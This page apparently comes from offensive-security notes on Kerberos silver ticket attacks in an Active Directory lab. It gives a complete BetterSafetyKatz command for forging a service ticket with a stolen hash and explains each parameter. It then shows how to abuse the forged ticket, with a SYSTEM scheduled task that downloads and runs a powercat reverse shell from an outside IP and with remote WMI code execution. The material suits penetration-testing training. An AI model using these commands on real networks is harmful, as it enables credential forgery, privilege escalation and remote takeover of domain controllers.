Silver Ticket
Silver ticket is signed and encrypted by the hash of service account which makes it a valid TGS ticket.
Create The Ticket
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden
/User:Administrator /domain:dollarcorp.moneycorp.local
/sid:S-1-5-21-719815819-3726368948-3917688648
/target:dcorp-dc.dollarcorp.moneycorp.local
/service:CIFS /rc4:e9bb4c3d1327e29093dfecab8c2676f6
/startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
kerberos::golden
Name of the module
/User:Administrator
Username for which the TGT is generated
/domain:
Domain FQDN
/sid:
SID of the domain
/target:
Target server FQDN
/service:
The SPN name of service for which TGS is to be created
/aes256:
AES256 keys of the krbtgt account
/id:500 /groups:512
Optional User and Group RID
/ptt
ptt: inject ticket to current process
/startoffset:0
Optional when the ticket is available in minutes. Use negative for a ticket available from past and a larger number for future.
/endin:600
Optional ticket lifetime in minutes. (default 10 years) The default AD setting is 10 hours = 600 minutes
/renewmax:10080
Optional ticket lifetime with renewal in minutes. (default is 10 years) The default AD setting is 7 days = 100800
Abusing Services
HOST
HOST Service permission allows to create scheduled tasks in remote computers The Silver ticket needs to be created with the NT Hash of the target machine
# Check you have permissions
schtasks /S dcorp-dc.dollarcorp.moneycorp.local
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "Job" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.83/powercat.ps1''')'"
#Run created schtask now
schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "Job"
HOST + RPCSS
With these tickets you can execute WMI in the victim system:
#Check you have permissions
Invoke-WmiMethod -class win32_operatingsystem -ComputerName dcorp-dc
# Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$Program"
gwmi -class win32_operatingsystem -ComputerName dcorp-dc
Last updated
Was this helpful?